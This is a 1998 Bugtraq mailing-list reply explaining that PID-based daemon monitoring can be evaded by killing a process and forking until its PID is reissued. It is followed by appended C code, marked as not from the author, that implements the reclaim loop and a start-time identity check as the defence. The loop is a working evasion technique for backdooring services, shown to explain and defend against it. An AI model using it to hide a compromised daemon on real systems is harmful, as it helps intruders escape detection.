[6967] in bugtraq
Re: Vulnerability in 4.4BSD Secure Levels Implementation
daemon@ATHENA.MIT.EDU (tqbf@POBOX.COM)
Sun Jun 14 23:12:01 1998
Date: Sun, 14 Jun 1998 03:43:02 -0500
Reply-To: tqbf@pobox.com
From: tqbf@POBOX.COM
To: BUGTRAQ@NETSPACE.ORG
> Unless there is an
> application (or the system itself) that periodically checks for any
> change in status of a system daemon (like the change of a PID),
Watch out. You can't assume that a change of processes is detectable by a
change in the PID --- if I kill off the original holder of a PID, I can
claim that PID by forking until the OS re-uses it for my own process. Even
if the system uses randomized PIDs (a cool idea), I will still eventually
receive the one I want, and until I do (we're probably talking seconds),
I can keep the service I'm backdooring running on a different PID.
-----------------------------------------------------------------------------
Thomas H. Ptacek The Company Formerly Known As Secure Networks, Inc.
-----------------------------------------------------------------------------
http://www.pobox.com/~tqbf "If you're so special, why aren't you dead?"
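The PID-reclaiming loop described above, written out as an added example (this is not code from the post or from its author): an attacker side that forks until the kernel hands a freed PID back to one of its children, and the check a monitor should make instead of comparing PID numbers. The function names `reclaim_pid`, `proc_starttime` and `is_same_process`, the stand-in "victim" daemon and the attempt bound are all assumptions of this example; the start-time lookup assumes a Linux-style /proc, the fork loop itself is plain POSIX.

```c
/* Added example, not from the original post. Assumes Linux /proc for the
 * start-time lookup; the fork loop is plain POSIX. */
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Start time of a process: field 22 of /proc/<pid>/stat, in clock ticks
 * since boot. Returns -1 if the PID is not live or /proc is unavailable.
 * (pid, starttime) identifies one incarnation of a process; pid alone
 * does not, which is the point of the post. */
long long proc_starttime(pid_t pid)
{
    char path[64], buf[1024];
    snprintf(path, sizeof path, "/proc/%d/stat", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    /* comm (field 2) is parenthesised and may contain spaces, so scan
     * from the last ')' rather than splitting the whole line on ' '. */
    char *p = strrchr(buf, ')');
    if (!p) return -1;
    p += 2;                              /* skip ") " to field 3 (state) */
    for (int field = 3; field < 22; field++) {
        p = strchr(p, ' ');
        if (!p) return -1;
        p++;
    }
    return strtoll(p, NULL, 10);
}

/* What a monitor should verify: the PID it remembered AND the start time
 * it recorded for that PID. A reclaimed PID fails the second half. */
int is_same_process(pid_t pid, long long recorded_start)
{
    long long now = proc_starttime(pid);
    return now != -1 && now == recorded_start;
}

/* Attacker side. The original holder of `target` has been killed; fork
 * until the kernel re-issues that number to one of our children. The
 * child that gets it stays alive (here it just pauses; a backdoor would
 * exec the trojaned daemon at this point and the attacker's interim copy,
 * running under some other PID, would be stopped). Every other child
 * exits at once. Returns target on success, -1 after max_forks attempts.
 * With sequential allocation this means walking the whole PID space;
 * with randomised PIDs the expected number of forks is about the same,
 * which is why randomisation only delays the attacker. */
pid_t reclaim_pid(pid_t target, long max_forks)
{
    for (long i = 0; i < max_forks; i++) {
        pid_t child = fork();
        if (child < 0) return -1;
        if (child == 0) {
            if (getpid() == target) pause();  /* hold the PID until killed */
            _exit(0);
        }
        if (child == target) return target;   /* leave it alive for the caller */
        while (waitpid(child, NULL, 0) < 0)   /* reap the miss */
            if (errno != EINTR) return -1;
    }
    return -1;
}

int main(void)
{
    /* Constructed scenario: a stand-in "daemon" that exits, freeing its PID. */
    pid_t victim = fork();
    if (victim == 0) _exit(0);
    long long victim_start = proc_starttime(victim);   /* zombie still has /proc */
    waitpid(victim, NULL, 0);

    /* Bound the loop by pid_max so the demo always terminates. */
    long max = 32768;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &max) != 1) max = 32768; fclose(f); }

    pid_t got = reclaim_pid(victim, max * 2);
    if (got == victim) {
        printf("reclaimed pid %d: starttime %lld -> %lld, same process? %d\n",
               (int)got, victim_start, proc_starttime(got),
               is_same_process(got, victim_start));
        kill(got, SIGKILL);
        waitpid(got, NULL, 0);
    } else {
        printf("gave up after %ld forks\n", max * 2);
    }
    return 0;
}
```

On a box whose pid_max is the classic 32768 the demo reclaims the PID in a second or two; on systems with a multi-million pid_max it still gets there, just slowly, which is exactly the "we're probably talking seconds" point. The monitor-side fix is the `is_same_process` check: record start time (or equivalent identity such as the executable's inode) alongside the PID, not the PID by itself.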